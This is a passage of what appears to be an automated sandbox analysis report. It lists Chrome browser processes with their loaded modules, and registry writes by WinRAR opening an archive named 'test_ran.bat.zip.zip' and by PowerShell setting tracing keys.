c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
3568
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=568 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_watcher.dll

PID
1412
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D6F98CAFFE73E5AAD170818777692A5C --mojo-platform-channel-handle=880 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

PID
2088
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --service-pipe-token=9DD58F93F523210E18A95845D75F515D --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9DD58F93F523210E18A95845D75F515D --renderer-client-id=5 --mojo-platform-channel-handle=1912 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2192
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --service-pipe-token=E3BE1B6E1EC134F95142BD2845174A04 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=E3BE1B6E1EC134F95142BD2845174A04 --renderer-client-id=3 --mojo-platform-channel-handle=2040 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3664
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=57F6BA6F99B21EECA9487CCF7DF10816 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=57F6BA6F99B21EECA9487CCF7DF10816 --renderer-client-id=6 --mojo-platform-channel-handle=3524 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2968
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=7804EBFD8C36FE943546CA196C8BD9B4 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=7804EBFD8C36FE943546CA196C8BD9B4 --renderer-client-id=7 --mojo-platform-channel-handle=3780 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3328
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=0A6E2CEEA3A6A47F3B45D026F484B9C6 --mojo-platform-channel-handle=3556 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

PID
2020
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --lang=en-US --no-sandbox --service-request-channel-token=3FF1DFAC1AA071C1677C47495E33B9DD --mojo-platform-channel-handle=3584 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\twext.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\zipfldr.dll
c:\program files\winrar\rarext.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\syncui.dll
c:\windows\system32\synceng.dll
c:\program files\notepad++\nppshell_06.dll
c:\windows\system32\acppage.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\msi.dll
c:\windows\system32\wer.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
1775
Read events
1590
Write events
184
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3708
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
0
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000BC031B000000000039000000B40200000000000001000000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C80000000000000000000000000006021A0000000000160000002A0000000000000002000000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C80000000000000000000000000094050B000000000016000000640000000000000003000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
1216
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
1
C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zip
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
1216
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\acppage.dll,-6002
Windows Batch File
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
0
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C8000000000000000000000000003A0121000000000039000000B40200000000000001000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C800000000000000000000000000B803180000000000160000002A0000000000000002000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000008C0607000000000016000000640000000000000003000000
256
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
256
powershell.exe
write
